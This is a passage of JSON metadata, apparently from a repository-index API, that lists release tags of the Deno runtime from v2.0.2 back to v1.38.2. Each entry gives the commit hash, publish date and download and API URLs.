denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"pu